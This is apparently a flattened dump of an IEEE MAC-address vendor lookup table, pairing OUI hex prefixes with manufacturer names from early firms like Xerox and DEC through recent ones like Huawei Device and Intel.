009019 HERMES ELECTRONICS CO., LTD. 0090D8 WHITECROSS SYSTEMS 00104E CEOLOGIC 0010C2 WILLNET, INC. 001040 INTERMEC CORPORATION 00102E NETWORK SYSTEMS & TECHNOLOGIES PVT. LTD. 0010B0 MERIDIAN TECHNOLOGY CORP. 001021 ENCANTO NETWORKS, INC. 001064 DNPG, LLC 001074 ATEN INTERNATIONAL CO., LTD. 00109E AWARE, INC. 001005 UEC COMMERCIAL 0010B8 ISHIGAKI COMPUTER SYSTEM CO. 00108B LASERANIMATION SOLLINGER GMBH 0010C7 DATA TRANSMISSION NETWORK 001070 CARADON TREND LTD. 0010BA MARTINHO-DAVIS SYSTEMS, INC. 0010B4 ATMOSPHERE NETWORKS 0004AC IBM Corp 001067 Ericsson 00E07D NETRONIX, INC. 00E028 APTIX CORPORATION 00E08C NEOPARADIGM LABS, INC. 00E0A1 HIMA PAUL HILDEBRANDT GmbH Co. KG 00E088 LTX-Credence CORPORATION 00E05D UNITEC CO., LTD. 00E05E JAPAN AVIATION ELECTRONICS INDUSTRY, LTD. 00E09D SARNOFF CORPORATION 00E058 PHASE ONE DENMARK A/S 00E076 DEVELOPMENT CONCEPTS, INC. 00E0F8 DICNA CONTROL AB 00E0DF KEYMILE GmbH 00E0F2 ARLOTTO COMNET, INC. 00E0E1 G2 NETWORKS, INC. 00E03D FOCON ELECTRONIC SYSTEMS A/S 00E046 BENTLY NEVADA CORP. 00E07B BAY NETWORKS 00E01D WebTV NETWORKS, INC. 00E0CD SAAB SENSIS CORPORATION 00E08D PRESSURE SYSTEMS, INC. 00E019 ING. GIORDANO ELETTRONICA 00E047 InFocus Corporation 00E0C3 SAKAI SYSTEM DEVELOPMENT CORP. 00E092 ADMTEK INCORPORATED 00E0FF SECURITY DYNAMICS TECHNOLOGIES, Inc. 00E0AB DIMAT S.A. 00E030 MELITA INTERNATIONAL CORP. 00E033 E.E.P.D. GmbH 00E0A2 MICROSLATE INC. 00E079 A.T.N.R. 00E075 Verilink Corporation 006039 SanCom Technology, Inc. 006049 VINA TECHNOLOGIES 00608D UNIPULSE CORP. 00E02E SPC ELECTRONICS CORPORATION 00E09A Positron Inc. 00E03E ALFATECH, INC. 006099 SBE, Inc. 0060B3 Z-COM, INC. 006002 SCREEN SUBTITLING SYSTEMS, LTD 006089 XATA 006021 DSC CORPORATION 0060B8 CORELIS Inc. 00E0AA ELECTROSONIC LTD. 00E010 HESS SB-AUTOMATENBAU GmbH 00E0D2 VERSANET COMMUNICATIONS, INC. 0060CE ACCLAIM COMMUNICATIONS 006036 AIT Austrian Institute of Technology GmbH 00608E HE ELECTRONICS, TECHNOLOGIE & SYSTEMTECHNIK GmbH 00601A KEITHLEY INSTRUMENTS 00606A MITSUBISHI WIRELESS COMMUNICATIONS. INC. 0060AD MegaChips Corporation 006055 CORNELL UNIVERSITY 00606D DIGITAL EQUIPMENT CORP. 0060B9 NEC Platforms, Ltd 00609C Perkin-Elmer Incorporated 0060CF ALTEON NETWORKS, INC. 006075 PENTEK, INC. 0060B7 CHANNELMATIC, INC. 006006 SOTEC CO., LTD 0060BA SAHARA NETWORKS, INC. 006098 HT COMMUNICATIONS 0060DE Kayser-Threde GmbH 0060D0 SNMP RESEARCH INCORPORATED 006015 NET2NET CORPORATION 00609D PMI FOOD EQUIPMENT GROUP 0060A2 NIHON UNISYS LIMITED CO. 006084 DIGITAL VIDEO 00602D ALERTON TECHNOLOGIES, INC. 0060F8 Loran International Technologies Inc. 006078 POWER MEASUREMENT LTD. 0060E8 HITACHI COMPUTER PRODUCTS (AMERICA), INC. 0060F6 NEXTEST COMMUNICATIONS PRODUCTS, INC. 006072 VXL INSTRUMENTS, LIMITED 006051 QUALITY SEMICONDUCTOR 006092 MICRO/SYS, INC. 00609E ASC X3 - INFORMATION TECHNOLOGY STANDARDS SECRETARIATS 006010 NETWORK MACHINES, INC. 006044 LITTON/POLY-SCIENTIFIC 006004 COMPUTADORES MODULARES SA 0060E2 QUEST ENGINEERING & DEVELOPMENT 0060B4 GLENAYRE R&D INC. 00A01D Red Lion Controls, LP 00A0A6 M.I. SYSTEMS, K.K. 00A051 ANGIA COMMUNICATIONS. INC. 00A013 TELTREND LTD. 00A0B9 EAGLE TECHNOLOGY, INC. 00A019 NEBULA CONSULTANTS, INC. 00A0ED Brooks Automation, Inc. 0060CA HARMONIC SYSTEMS INCORPORATED 006024 GRADIENT TECHNOLOGIES, INC. 0060AF PACIFIC MICRO DATA, INC. 006038 Nortel Networks 00604F Tattile SRL 00A0D0 TEN X TECHNOLOGY, INC. 00A0BC VIASAT, INCORPORATED 00A05B MARQUIP, INC. 00A08C MultiMedia LANs, Inc. 00A058 GLORY, LTD. 00A077 FUJITSU NEXION, INC. 00A0A0 COMPACT DATA, LTD. 00A038 EMAIL ELECTRONICS 00A065 Symantec Corporation 00A0A3 RELIABLE POWER METERS 00A01B PREMISYS COMMUNICATIONS, INC. 00A055 Data Device Corporation 00A074 PERCEPTION TECHNOLOGY 00A07F GSM-SYNTEL, LTD. 00A029 COULTER CORPORATION 00A087 Microsemi Corporation 00A043 AMERICAN TECHNOLOGY LABS, INC. 00A042 SPUR PRODUCTS CORP. 00A0C1 ORTIVUS MEDICAL AB 00A04F AMERITEC CORP. 00A0CF SOTAS, INC. 00A072 OVATION SYSTEMS LTD. 00A082 NKT ELEKTRONIK A/S 00A0F0 TORONTO MICROELECTRONICS INC. 00A0D7 KASTEN CHASE APPLIED RESEARCH 00A0F1 MTI 00A0B3 ZYKRONIX 00A0FF TELLABS OPERATIONS, INC. 00A0E5 NHC COMMUNICATIONS 00A036 APPLIED NETWORK TECHNOLOGY 00A0D2 ALLIED TELESIS INTERNATIONAL CORPORATION 00A09B QPSX COMMUNICATIONS, LTD. 00A000 CENTILLION NETWORKS, INC. 00A08A BROOKTROUT TECHNOLOGY, INC. 00A07B DAWN COMPUTER INCORPORATION 00A05C INVENTORY CONVERSION, INC./ 00200F EBRAINS Inc 00A0D3 INSTEM COMPUTER SYSTEMS, LTD. 00A0B4 TEXAS MICROSYSTEMS, INC. 00A060 ACER PERIPHERALS, INC. 00A083 ASIMMPHONY TURKEY 00A0AA SPACELABS MEDICAL 00A03B TOSHIN ELECTRIC CO., LTD. 00A0F3 STAUBLI 0020DF KYOSAN ELECTRIC MFG. CO., LTD. 0020C7 AKAI Professional M.I. Corp. 00A004 NETPOWER, INC. 002029 TELEPROCESSING PRODUCTS, INC. 002069 ISDN SYSTEMS CORPORATION 00208B LAPIS TECHNOLOGIES, INC. 00202B ADVANCED TELECOMMUNICATIONS MODULES, LTD. 00206B KONICA MINOLTA HOLDINGS, INC. 002004 YAMATAKE-HONEYWELL CO., LTD. 002015 ACTIS COMPUTER SA 002099 BON ELECTRIC CO., LTD. 0020F9 PARALINK NETWORKS, INC. 002092 CHESS ENGINEERING B.V. 002043 NEURON COMPANY LIMITED 002071 IBR GMBH 00207C AUTEC GMBH 002057 TITZE DATENTECHNIK GmbH 0020E5 APEX DATA, INC. 002087 MEMOTEC, INC. 0020BC Long Reach Networks Pty Ltd 00C0C0 SHORE MICROSYSTEMS, INC. 00C00C RELIA TECHNOLGIES 00C073 XEDIA CORPORATION 00C0D4 AXON NETWORKS, INC. 00C0CD COMELTA, S.A. 0020ED GIGA-BYTE TECHNOLOGY CO., LTD. 002085 Eaton Corporation 0020CD HYBRID NETWORKS, INC. 00202E DAYSTAR DIGITAL 0020B3 Tattile SRL 0020EE GTECH CORPORATION 00204C MITRON COMPUTER PTE LTD. 002017 ORBOTECH 002093 LANDINGS TECHNOLOGY CORP. 002063 WIPRO INFOTECH LTD. 002016 SHOWA ELECTRIC WIRE & CABLE CO 00204D INOVIS GMBH 00205F GAMMADATA COMPUTER GMBH 00201F BEST POWER TECHNOLOGY, INC. 0020B6 AGILE NETWORKS, INC. 0020D1 MICROCOMPUTER SYSTEMS (M) SDN. 0020CE LOGICAL DESIGN GROUP, INC. 002014 GLOBAL VIEW CO., LTD. 0020C2 TEXAS MEMORY SYSTEMS, INC. 00C0F3 NETWORK COMMUNICATIONS CORP. 002056 NEOPRODUCTS 002042 DATAMETRICS CORP. 002078 RUNTOP, INC. 002006 GARRETT COMMUNICATIONS, INC. 002024 PACIFIC COMMUNICATION SCIENCES 00205D NANOMATIC OY 00C005 LIVINGSTON ENTERPRISES, INC. 00C077 DAEWOO TELECOM LTD. 00C0C8 MICRO BYTE PTY. LTD. 00C069 Axxcelera Broadband Wireless 00C067 UNITED BARCODE INDUSTRIES 00C0A3 DUAL ENTERPRISES CORPORATION 00C018 LANART CORPORATION 009D8E CARDIAC RECORDERS, INC. 00BB01 OCTOTHORPE CORP. 00C033 TELEBIT COMMUNICATIONS APS 00C090 PRAIM S.R.L. 00C0DE ZCOMM, INC. 00C013 NETRIX 00C06B OSI PLUS CORPORATION 00C04C DEPARTMENT OF FOREIGN AFFAIRS 00C07C HIGHTECH INFORMATION 00C0B8 FRASER'S HILL LTD. 00C062 IMPULSE TECHNOLOGY 00C0EC DAUPHIN TECHNOLOGY 00C086 THE LYNK CORPORATION 00C058 DATAEXPERT CORP. 00C0D0 RATOC SYSTEM INC. 00C0BF TECHNOLOGY CONCEPTS, LTD. 00C0BA NETVANTAGE 00C05E VARI-LITE, INC. 00C0D5 Werbeagentur Jürgen Siebert 00C063 MORNING STAR TECHNOLOGIES, INC 00C021 NETEXPRESS 00C0DB IPC CORPORATION (PTE) LTD. 00C09B RELIANCE COMM/TEC, R-TEC 00C06A ZAHNER-ELEKTRIK GMBH & CO. KG 00C0E3 OSITECH COMMUNICATIONS, INC. 00C0FE APTEC COMPUTER SYSTEMS, INC. 00C016 ELECTRONIC THEATRE CONTROLS 00C0BC TELECOM AUSTRALIA/CSSC 00C0C1 QUAD/GRAPHICS, INC. 00C089 TELINDUS DISTRIBUTION 00C0B0 GCC TECHNOLOGIES,INC. 00C00A MICRO CRAFT 00C074 TOYODA AUTOMATIC LOOM 00404E FLUENT, INC. 00408D THE GOODYEAR TIRE & RUBBER CO. 00401B PRINTER SYSTEMS CORP. 0040A3 MICROUNITY SYSTEMS ENGINEERING 0040B3 ParTech Inc. 00401D INVISIBLE SOFTWARE, INC. 00C0CA ALFA, INC. 00C06C SVEC COMPUTER CORP. 0040FF TELEBIT CORPORATION 00401F COLORGRAPH LTD 0040AF DIGITAL PRODUCTS, INC. 0040F7 Polaroid Corporation 004037 SEA-ILAN, INC. 00C026 LANS TECHNOLOGY CO., LTD. 00407E EVERGREEN SYSTEMS, INC. 0040F9 COMBINET 00C06F KOMATSU LTD. 00C0A7 SEEL LTD. 00C04A GROUP 2000 AG 004054 CONNECTION MACHINES SERVICES 004004 ICM CO. LTD. 004058 KRONOS, INC. 004018 ADOBE SYSTEMS, INC. 00404A WEST AUSTRALIAN DEPARTMENT 00403C FORKS, INC. 004042 N.A.T. GMBH 0040F2 JANICH & KLASS COMPUTERTECHNIK 0040A2 KINGSTAR TECHNOLOGY INC. 0040DC TRITEC ELECTRONIC GMBH 004060 COMENDEC LTD 004056 MCM JAPAN LTD. 004030 GK COMPUTER 004040 RING ACCESS, INC. 008057 ADSOFT, LTD. 0080BB HUGHES LAN SYSTEMS 00403D Teradata Corporation 0040D0 MITAC INTERNATIONAL CORP. 0040B6 COMPUTERMCORPORATION 0040A6 Cray, Inc. 00403E RASTER OPS CORPORATION 004046 UDC RESEARCH LIMITED 00C0D7 TAIWAN TRADING CENTER DBA 0040DA TELSPEC LTD 0040C7 RUBY TECH CORPORATION 004052 STAR TECHNOLOGIES, INC. 00402E PRECISION SOFTWARE, INC. 00402B TRIGEM COMPUTER, INC. 00401A FUJI ELECTRIC CO., LTD. 00405F AFE COMPUTERS LTD. 004080 ATHENIX CORPORATION 004051 Garbee and Garbee 00407A SOCIETE D'EXPLOITATION DU CNIT 004031 KOKUSAI ELECTRIC CO., LTD 0040D3 KIMPSION INTERNATIONAL CORP. 0040EE OPTIMEM 004025 MOLECULAR DYNAMICS 004067 OMNIBYTE CORPORATION 0040C3 FISCHER AND PORTER CO. 0040EC MIKASA SYSTEM ENGINEERING 00802F NATIONAL INSTRUMENTS CORP. 008054 FRONTIER TECHNOLOGIES CORP. 008053 INTELLICOM, INC. 008026 NETWORK PRODUCTS CORPORATION 0080B0 ADVANCED INFORMATION 0080FA RWT GMBH 0080FD EXSCEED CORPRATION 0080FE AZURE TECHNOLOGIES, INC. 00803C TVS ELECTRONICS LTD 008046 Tattile SRL 004002 PERLE SYSTEMS LIMITED 004049 Roche Diagnostics International Ltd. 004029 Compex 00409E CONCURRENT TECHNOLOGIESLTD. 0080AD CNET TECHNOLOGY, INC. 00800E ATLANTIX CORPORATION 0080AB DUKANE NETWORK INTEGRATION 0080F1 OPUS SYSTEMS 008029 EAGLE TECHNOLOGY, INC. 008072 MICROPLEX SYSTEMS LTD. 004001 Zero One Technology Co. Ltd. 004071 ATM COMPUTER GMBH 008011 DIGITAL SYSTEMS INT'L. INC. 008034 SMT GOUPIL 0080E4 NORTHWEST DIGITAL SYSTEMS, INC 0080EC SUPERCOMPUTING SOLUTIONS, INC. 00802C THE SAGE GROUP PLC 0080D6 NUVOTECH, INC. 00800A JAPAN COMPUTER CORP. 00804B EAGLE TECHNOLOGIES PTY.LTD. 0080C8 D-LINK SYSTEMS, INC. 008012 INTEGRATED MEASUREMENT SYSTEMS 008027 ADAPTIVE SYSTEMS, INC. 0080FC AVATAR CORPORATION 008016 WANDEL AND GOLTERMANN 0080A2 CREATIVE ELECTRONIC SYSTEMS 0080CC MICROWAVE BYPASS SYSTEMS 0080A5 SPEED INTERNATIONAL 008079 MICROBUS DESIGNS LTD. 000079 NETWORTH INCORPORATED 000091 ANRITSU CORPORATION 000075 Nortel Networks 0000A5 Tattile SRL 000036 ATARI CORPORATION 0000F8 DIGITAL EQUIPMENT CORPORATION 00805C AGILIS CORPORATION 0080C5 NOVELLCO DE MEXICO 008078 PRACTICAL PERIPHERALS, INC. 0080F6 SYNERGY MICROSYSTEMS 00807B ARTEL COMMUNICATIONS CORP. 008014 ESPRIT SYSTEMS 0080B7 STELLAR COMPUTER 0000ED APRIL 0000A3 NETWORK APPLICATION TECHNOLOGY 000039 TOSHIBA CORPORATION 00003C AUSPEX SYSTEMS INC. 00007E CLUSTRIX CORPORATION 0000CB COMPU-SHACK ELECTRONIC GMBH 000013 CAMEX 000095 SONY TEKTRONIX CORP. 000057 SCITEX CORPORATION LTD. 0000D6 PUNCH LINE HOLDING 00009E MARLI S.A. 000042 METIER MANAGEMENT SYSTEMS LTD. 00007D Oracle Corporation 000096 MARCONI ELECTRONICS LTD. 00005E ICANN, IANA Department 000038 CSS LABS 000044 CASTELLE CORPORATION 0000CE MEGADATA CORP. 00007B RESEARCH MACHINES 00000F NEXT, INC. 0000BB TRI-DATA 00001A ADVANCED MICRO DEVICES 00007F LINOTYPE-HELL AG 000060 KONTRON ELEKTRONIK GMBH 08006F PHILIPS APELDOORN B.V. 000040 APPLICON, INC. 00005D CS TELECOM 000012 INFORMATION TECHNOLOGY LIMITED 00008A DATAHOUSE INFORMATION SYSTEMS 000032 Marconi plc 000085 CANON INC. 00004A ADC CODENOLL TECHNOLOGY CORP. 08008F CHIPCOM CORPORATION 00006A COMPUTER CONSOLES INC. 08003E CODEX CORPORATION 080040 FERRANTI COMPUTER SYS. LIMITED 08003A ORCATECH INC. 08003D CADNETIX CORPORATIONS 080038 BULL S.A.S. 080073 TECMAR INC. 080072 XEROX CORP UNIV GRANT PROGRAM 08006A AT&T 08007A INDATA 080079 THE DROID WORKS 08004D CORVUS SYSTEMS INC. 08002F PRIME COMPUTER INC. 08002C BRITTON LEE INC. 080062 General Dynamics 08005C FOUR PHASE SYSTEMS 08005A IBM Corp 080052 INSYSTEC 08001E APOLLO COMPUTER INC. 080019 GENERAL ELECTRIC CORPORATION 027001 RACAL-DATACOM 08000E NCR CORPORATION 00DD09 UNGERMANN-BASS INC. 000002 XEROX CORPORATION 000003 XEROX CORPORATION 000006 XEROX CORPORATION 080001 COMPUTERVISION CORPORATION 080005 SYMBOLICS INC. 00DD07 UNGERMANN-BASS INC. 000008 XEROX CORPORATION 00003D UNISYS 00DD0D UNGERMANN-BASS INC. 080064 Sitasys AG 080002 BRIDGE COMMUNICATIONS INC. 08001A TIARA/ 10NET 08008B PYRAMID TECHNOLOGY CORP. 080012 BELL ATLANTIC INTEGRATED SYST. 14A1BF ASSA ABLOY Korea Co., Ltd Unilock 9483C4 GL Technologies (Hong Kong) Limited 080030 ROYAL MELBOURNE INST OF TECH 00000B MATRIX CORPORATION 00009B INFORMATION INTERNATIONAL, INC 9C93B0 Megatronix (Beijing) Technology Co., Ltd. 64AEF1 Qingdao Hisense Electronics Co.,Ltd. 080016 BARRISTER INFO SYS CORP 44CB8B LG Innotek B4055D Inspur Electronic Information Industry Co.,Ltd. 984827 TP-LINK TECHNOLOGIES CO.,LTD. D4F5EF Hewlett Packard Enterprise 28BD89 Google, Inc. EC1BBD Silicon Laboratories D8A315 vivo Mobile Communication Co., Ltd. 80647A Ola Sense Inc 70F82B DWnet Technologies(Suzhou) Corporation 142475 4DReplay, Inc 10DCB6 IEEE Registration Authority F89E28 Cisco Meraki F8C4F3 Shanghai Infinity Wireless Technologies Co.,Ltd. D4772B Nanjing Ztlink Network Technology Co.,Ltd 64F9C0 ANALOG DEVICES 18D0C5 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 34ED1B Cisco Systems, Inc BCA511 NETGEAR 000A7B Cornelius Consult C4E90A D-Link International C4447D HUAWEI TECHNOLOGIES CO.,LTD 30E98E HUAWEI TECHNOLOGIES CO.,LTD 748B34 Shanghai Smart System Technology Co., Ltd ACBD70 Huawei Device Co., Ltd. C02E26 Private 34D262 SZ DJI TECHNOLOGY CO.,LTD 0812A5 Amazon Technologies Inc. 807FF8 Juniper Networks 440377 IEEE Registration Authority 002487 Transact Campus, Inc. B4E9A3 port industrial automation GmbH 38E8EE Nanjing Youkuo Electric Technology Co., Ltd 90B8E0 SHENZHEN YANRAY TECHNOLOGY CO.,LTD 9CF531 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 80E455 New H3C Technologies Co., Ltd 2C4CC6 Murata Manufacturing Co., Ltd. 7C210D Cisco Systems, Inc 4CBC72 Primex Wireless 6802B8 Compal Broadband Networks, Inc. 3463D4 BIONIX SUPPLYCHAIN TECHNOLOGIES SLU 08F7E9 HRCP Research and Development Partnership 8CBA25 UNIONMAN TECHNOLOGY CO.,LTD D49E3B Guangzhou Shiyuan Electronic Technology Company Limited DCDCE2 Samsung Electronics Co.,Ltd A0AC69 Samsung Electronics Co.,Ltd 1089FB Samsung Electronics Co.,Ltd DC4BDD Shenzhen SuperElectron Technology Co.,Ltd. C0B5CD Huawei Device Co., Ltd. 4C5077 Huawei Device Co., Ltd. 502DBB GD Midea Air-Conditioning Equipment Co.,Ltd. 84EA97 Shenzhen iComm Semiconductor Co., Ltd. 5C3A3D zte corporation 30FD65 HUAWEI TECHNOLOGIES CO.,LTD 7CA1AE Apple, Inc. 3C22FB Apple, Inc. 58EAFC ELL-IoT Inc 9013DA Athom B.V. 14115D Skyworth Digital Technology(Shenzhen) Co.,Ltd E4F327 ATOL LLC 6819AC Guangzhou Xianyou Intelligent Technogoly CO., LTD E82E0C NETINT Technologies Inc. 1892A4 Ciena Corporation 10082C Texas Instruments B0735D Huawei Device Co., Ltd. F0B4D2 D-Link International 5C3A45 CHONGQING FUGUI ELECTRONICS CO.,LTD. A03C31 Shenzhen Belon Technology CO.,LTD A897CD ARRIS Group, Inc. 404C77 ARRIS Group, Inc. 2CE310 Stratacache 0022A0 APTIV SERVICES US, LLC A4307A Samsung Electronics Co.,Ltd FC8E5B China Mobile Iot Limited company 142A14 ShenZhen Selenview Digital Technology Co.,Ltd D87E76 ITEL MOBILE LIMITED 384B5B ZTRON TECHNOLOGY LIMITED B86142 Beijing Tricolor Technology Co., Ltd 200A0D IEEE Registration Authority E47C65 Sunstar Communication TechnologyCo., Ltd 9C54DA SkyBell Technologies Inc. 4C494F zte corporation C4741E zte corporation 00D078 Eltex of Sweden AB 5C78F8 Huawei Device Co., Ltd. B827C5 Huawei Device Co., Ltd. DC8983 Samsung Electronics Co.,Ltd 5CCB99 Samsung Electronics Co.,Ltd D46075 Baidu Online Network Technology (Beijing) Co., Ltd 78C5F8 Huawei Device Co., Ltd. D45D64 ASUSTek COMPUTER INC. 90B144 Samsung Electronics Co.,Ltd 48DD0C eero inc. 940C98 Apple, Inc. E8FBE9 Apple, Inc. 38EC0D Apple, Inc. 58278C BUFFALO.INC 140AC5 Amazon Technologies Inc. 2083F8 Advanced Digital Broadcast SA C8C750 Motorola Mobility LLC, a Lenovo Company 2CDCD7 AzureWave Technology Inc. 34E3DA Hoval Aktiengesellschaft E0BB9E Seiko Epson Corporation 48D24F Sagemcom Broadband SAS E4AAEC Tianjin Hualai Technology Co., Ltd 94BE46 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. ACF8CC ARRIS Group, Inc. 8C5A25 ARRIS Group, Inc. 483FDA Espressif Inc. 6C5D3A Microsoft Corporation C853E1 Beijing Bytedance Network Technology Co., Ltd CCD42E Arcadyan Corporation 14169D Cisco Systems, Inc 48A2E6 Resideo 90E2FC IEEE Registration Authority 048C16 HUAWEI TECHNOLOGIES CO.,LTD 98DD5B TAKUMI JAPAN LTD B09575 TP-LINK TECHNOLOGIES CO.,LTD. F008D1 Espressif Inc. B4B055 HUAWEI TECHNOLOGIES CO.,LTD 14AE85 IEEE Registration Authority 5894B2 BrainCo 645CF3 ParanTek Inc. 8C3B32 Microfan B.V. D0D3E0 Aruba, a Hewlett Packard Enterprise Company FC3964 ITEL MOBILE LIMITED 90749D IRay Technology Co., Ltd. 540DF9 Huawei Device Co., Ltd. 006619 Huawei Device Co., Ltd. B0CCFE Huawei Device Co., Ltd. 3C5CF1 eero inc. E490FD Apple, Inc. D06544 Apple, Inc. 84AB1A Apple, Inc. 186F2D Shenzhen Sundray Technologies Company Limited F84FAD Hui Zhou Gaoshengda Technology Co.,LTD 4C0A3D ADNACOM INC. 206D31 FIREWALLA INC A84122 China Mobile (Hangzhou) Information Technology Co.,Ltd. 14472D GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 6CDDBC Samsung Electronics Co.,Ltd CC7F76 Cisco Systems, Inc 3C806B Hunan Voc Acoustics Technology Co., Ltd. 60DE35 GITSN, Inc. 28317E Hongkong Nano IC Technologies Co., Ltd 40BC68 Wuhan Funshion Online Technologies Co.,Ltd B802A4 Aeonsemi, Inc. E48326 HUAWEI TECHNOLOGIES CO.,LTD 447654 HUAWEI TECHNOLOGIES CO.,LTD 7CD9A0 HUAWEI TECHNOLOGIES CO.,LTD F033E5 HUAWEI TECHNOLOGIES CO.,LTD B8CEF6 Mellanox Technologies, Inc. 9405BB IEEE Registration Authority DC9840 Microsoft Corporation B4F18C Huawei Device Co., Ltd. C432D1 Farlink Technology Limited C8D778 BSH Hausgeraete GmbH 1869D8 HANGZHOU AIXIANGJI TECHNOLOGY CO., LTD 8C5FAD Fiberhome Telecommunication Technologies Co.,LTD ACC25D Fiberhome Telecommunication Technologies Co.,LTD 8C0C87 Nokia CC418E MSA Innovation CCA7C1 Google, Inc. 388479 Cisco Meraki 6849B2 CARLO GAVAZZI LTD 7C9EBD Espressif Inc. 1C0219 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD C095DA NXP India Private Limited 9C611D Panasonic Corporation of North America B42200 Brother Industries, LTD. 487AFF ESSYS D0B45D Huawei Device Co., Ltd. 8836CF Huawei Device Co., Ltd. 009EEE Positivo Tecnologia S.A. A4C54E Huawei Device Co., Ltd. D4BBE6 Huawei Device Co., Ltd. 40B6E7 Huawei Device Co., Ltd. 9C5D12 Extreme Networks, Inc. F09CE9 Extreme Networks, Inc. C413E2 Extreme Networks, Inc. 90B832 Extreme Networks, Inc. C8675E Extreme Networks, Inc. 402F86 LG Innotek D422CD Xsens Technologies B.V. F4EB9F Ellu Company 2019 SL E898C2 ZETLAB Company 64DDE9 Xiaomi Communications Co Ltd D41AC8 Nippon Printer Engineering 5061F6 Universal Electronics, Inc. 0C817D EEP Elektro-Elektronik Pranjic GmbH 000C32 Avionic Design GmbH 000A0D Amphenol 001BED Brocade Communications Systems LLC 000CDB Brocade Communications Systems LLC 000480 Brocade Communications Systems LLC B04502 Huawei Device Co., Ltd. 1C1FF1 Huawei Device Co., Ltd. 609C9F Brocade Communications Systems LLC 000088 Brocade Communications Systems LLC 0060DF Brocade Communications Systems LLC 006069 Brocade Communications Systems LLC 000533 Brocade Communications Systems LLC F45420 TELLESCOM INDUSTRIA E COMERCIO EM TELECOMUNICACAO 4C4088 SANSHIN ELECTRONICS CO.,LTD. 04F5F4 Proxim Wireless C8BCE5 Sense Things Japan INC. E8B470 IEEE Registration Authority B4EF1C 360 AI Technology Co.Ltd 14DE39 Huawei Device Co., Ltd. B8F009 Espressif Inc. 2468B0 Samsung Electronics Co.,Ltd FC71FA Trane Technologies CCBE59 Calix Inc. 84A3B5 Propulsion systems 9CEDFA EVUlution AG 9C19C2 Dongguan Liesheng Electronic Co., Ltd. D46761 XonTel Technology Co. 74CBF3 Lava international limited E44122 OnePlus Technology (Shenzhen) Co., Ltd 1C1338 Kimball Electronics Group, LLC 30FCEB LG Electronics (Mobile Communications) EC63ED Hyundai Autoever Corp. 18DFC1 Aetheros B05CDA HP Inc. F0D14F LINEAR LLC 2479EF Greenpacket Berhad, Taiwan 60AAEF Huawei Device Co., Ltd. BC26A1 FACTORY FIVE Corporation 001168 HomeLogic LLC 2CD066 Xiaomi Communications Co Ltd DCBD7A Guangzhou Shiyuan Electronic Technology Company Limited FCBC0E Zhejiang Cainiao Supply Chain Management Co., Ltd 9016BA HUAWEI TECHNOLOGIES CO.,LTD D44649 HUAWEI TECHNOLOGIES CO.,LTD D0F3F5 Huawei Device Co., Ltd. 9400B0 HUAWEI TECHNOLOGIES CO.,LTD C83DFC AlphaTheta Corporation E01995 Nutanix AC2334 Infinix mobility limited 002B67 LCFC(HeFei) Electronics Technology co., ltd F8BC0E eero inc. B85776 lignex1 2400FA China Mobile (Hangzhou) Information Technology Co., Ltd 50E039 Zyxel Communications Corporation F85128 SimpliSafe D8DC40 Apple, Inc. 805FC5 Apple, Inc. 3C4DBE Apple, Inc. 48262C Apple, Inc. AC1F09 shenzhen RAKwireless technologyCo.,Ltd BC13A8 Shenzhen YOUHUA Technology Co., Ltd 10F920 Cisco Systems, Inc 9077EE Cisco Systems, Inc 3C13CC Cisco Systems, Inc 94E3EE zte corporation 147DDA Apple, Inc. C4910C Apple, Inc. 206980 Apple, Inc. 645D86 Intel Corporate 181DEA Intel Corporate 185680 Intel Corporate A0A4C5 Intel Corporate F4D108 Intel Corporate 207918 Intel Corporate A86DAA Intel Corporate 6C9961 Sagemcom Broadband SAS 6432A8 Intel Corporate 801934 Intel Corporate 40A3CC Intel Corporate E4A7A0 Intel Corporate 04D3B0 Intel Corporate 50C709 Juniper Networks 806D97 Private 8CE468 Guangzhou Sageran Technology Co., Ltd. F4C114 Technicolor CH USA Inc. C8B29B Intel Corporate 6C6A77 Intel Corporate A4B1C1 Intel Corporate 342EB7 Intel Corporate 8CC681 Intel Corporate CCF9E4 Intel Corporate 3C58C2 Intel Corporate E45E37 Intel Corporate 380025 Intel Corporate 907841 Intel Corporate 58A023 Intel Corporate D4D252 Intel Corporate 24418C Intel Corporate 60F262 Intel Corporate C0B883 Intel Corporate C809A8 Intel Corporate 2848E7 Huawei Device Co., Ltd. E4268B Huawei Device Co., Ltd. C0E3A0 Renesas Electronics (Penang) Sdn. Bhd. 44680C Wacom Co.,Ltd. 980E24 Phytium Technology Co.,Ltd. A830BC Samsung Electronics Co.,Ltd 1C98C1 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. A09B17 Taicang T&W Electronics 0063DE CLOUDWALK TECHNOLOGY CO.,LTD 60A423 Silicon Laboratories 7846D4 Samsung Electronics Co.,Ltd E43EC6 HUAWEI TECHNOLOGIES CO.,LTD 38881E HUAWEI TECHNOLOGIES CO.,LTD 2CDB07 Intel Corporate 988D46 Intel Corporate E06CA6 Creotech Instruments S.A. 6888A1 Universal Electronics, Inc. 001EB2 LG Innotek C086B3 Shenzhen Voxtech Co., Ltd. 44ADB1 Sagemcom Broadband SAS 4401BB SHENZHEN BILIAN ELECTRONIC CO.,LTD 58F2FC Huawei Device Co., Ltd. 507043 BSkyB Ltd A0D83D Fiberhome Telecommunication Technologies Co.,LTD D01411 IEEE Registration Authority 3C53D7 CEDES AG 00E5E4 Sichuan Tianyi Comheart Telecom Co., Ltd. 643AEA Cisco Systems, Inc E8136E HUAWEI TECHNOLOGIES CO.,LTD 4CAE13 HUAWEI TECHNOLOGIES CO.,LTD 4C2EFE Shenzhen Comnect Technology Co.,LTD E0B260 TENO NETWORK TECHNOLOGIES COMPANY LIMITED 482335 Dialog Semiconductor Hellas SA E8DA20 Nintendo Co.,Ltd 10BC97 vivo Mobile Communication Co., Ltd. 7CF9A0 Fiberhome Telecommunication Technologies Co.,LTD 6CA4D1 Fiberhome Telecommunication Technologies Co.,LTD DCD444 Huawei Device Co., Ltd. A446B4 Huawei Device Co., Ltd. 0CC844 Cambridge Mobile Telematics, Inc. EC6C9A Arcadyan Corporation 346D9C Carrier Corporation 8C85C1 Aruba, a Hewlett Packard Enterprise Company 20A171 Amazon Technologies Inc. 782B64 Bose Corporation D4F756 zte corporation 54AB3A Quanta Computer Inc. E89A8F Quanta Computer Inc. E0693A Innophase Inc. 24FD0D Intelbras 345594 FUJIAN STAR-NET COMMUNICATION CO.,LTD 40AA56 China Dragon 